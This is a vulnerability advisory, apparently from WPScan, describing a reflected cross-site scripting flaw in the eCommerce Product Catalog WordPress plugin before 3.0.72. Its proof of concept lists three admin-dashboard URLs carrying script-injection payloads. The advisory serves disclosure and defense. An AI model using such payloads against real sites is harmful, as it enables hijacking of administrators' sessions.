WordPress Plugin Vulnerabilities
eCommerce Product Catalog Plugin for WordPress < 3.0.72 - Reflected XSS
Description
The plugin does not sanitise and escape some parameter before outputting them back in attributes and JS code in admin dashboards, leading to Reflected Cross-Site Scripting
Proof of Concept
Make a logged in admin open one of the URLs below https://example.com/wp-admin/edit.php?post_type=al_product&page=extensions.php&implecode_install=1&slug=a&url="><script>alert(/XSS/)</script> https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=</script><script>alert(/XSS/)</script> https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=%2527]%2522)%3Balert(/XSS/)//
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-17 (about 1 years ago)
Added
2022-10-17 (about 1 years ago)
Last Updated
2022-10-17 (about 1 years ago)